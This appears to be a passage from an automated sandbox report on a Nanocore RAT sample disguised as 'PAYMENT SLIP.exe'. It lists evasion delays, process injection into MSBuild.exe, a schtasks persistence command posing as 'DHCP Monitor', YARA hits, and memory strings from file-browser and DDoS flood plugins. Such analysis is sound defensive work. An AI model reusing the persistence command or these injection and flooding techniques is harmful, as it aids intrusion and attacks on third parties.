        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow / User API: foregroundWindowGot 755Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe TID: 6140Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6524Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6652Thread sleep time: -340000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe TID: 6348Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6956Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7000Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7048Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C4E
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_0040689A FindFirstFileW,FindClose,1_2_0040689A
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00402902 FindFirstFileW,1_2_00402902
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405C4E
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_0040689A FindFirstFileW,FindClose,8_2_0040689A
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_00402902 FindFirstFileW,8_2_00402902
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D1012 GetSystemInfo,12_2_057D1012
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeThread delayed: delay time: 30000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeThread delayed: delay time: 30000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeThread delayed: delay time: 922337203685477
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: MSBuild.exe, 0000000C.00000002.910250249.000000000160F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: MSBuild.exe, 0000000C.00000002.913661649.0000000006050000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_10001000 mov eax, dword ptr fs:[00000030h]1_2_10001000
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_10001110 mov eax, dword ptr fs:[00000030h]1_2_10001110
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00B1218C mov eax, dword ptr fs:[00000030h]1_2_00B1218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00B12451 mov eax, dword ptr fs:[00000030h]1_2_00B12451
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 6_2_0305218C mov eax, dword ptr fs:[00000030h]6_2_0305218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 6_2_03052451 mov eax, dword ptr fs:[00000030h]6_2_03052451
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_02F1218C mov eax, dword ptr fs:[00000030h]8_2_02F1218C
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_02F12451 mov eax, dword ptr fs:[00000030h]8_2_02F12451
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 10_2_023A2451 mov eax, dword ptr fs:[00000030h]10_2_023A2451
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 10_2_023A218C mov eax, dword ptr fs:[00000030h]10_2_023A218C
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 13_2_02F12451 mov eax, dword ptr fs:[00000030h]13_2_02F12451
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 13_2_02F1218C mov eax, dword ptr fs:[00000030h]13_2_02F1218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 20_2_022B218C mov eax, dword ptr fs:[00000030h]20_2_022B218C
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 20_2_022B2451 mov eax, dword ptr fs:[00000030h]20_2_022B2451
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 103E008Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: C0E008Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: A23008Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: MSBuild.exe, 0000000C.00000002.910250249.000000000160F000.00000004.00000020.sdmpBinary or memory string: Program Manager (IKEv2){DD7E8301-7047-4E86-A635-691AFA4197AE}y
        Source: MSBuild.exe, 0000000C.00000002.911166486.00000000036CA000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: MSBuild.exe, 0000000C.00000002.910582114.0000000001C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: MSBuild.exe, 0000000C.00000002.910582114.0000000001C20000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: MSBuild.exe, 0000000C.00000002.910250249.000000000160F000.00000004.00000020.sdmpBinary or memory string: Program Managersoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: MSBuild.exe, 0000000C.00000002.910582114.0000000001C20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmpBinary or memory string: Program Managerr
        Source: MSBuild.exe, 0000000C.00000002.910278193.0000000001648000.00000004.00000020.sdmpBinary or memory string: Program Manager<
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004035D8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORY
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: PAYMENT SLIP.exe, 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: PAYMENT SLIP.exe, 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: hmhrpib.exe, 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: PAYMENT SLIP.exe, 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000C.00000002.910952264.00000000034A1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: MSBuild.exe, 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
        Source: MSBuild.exe, 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
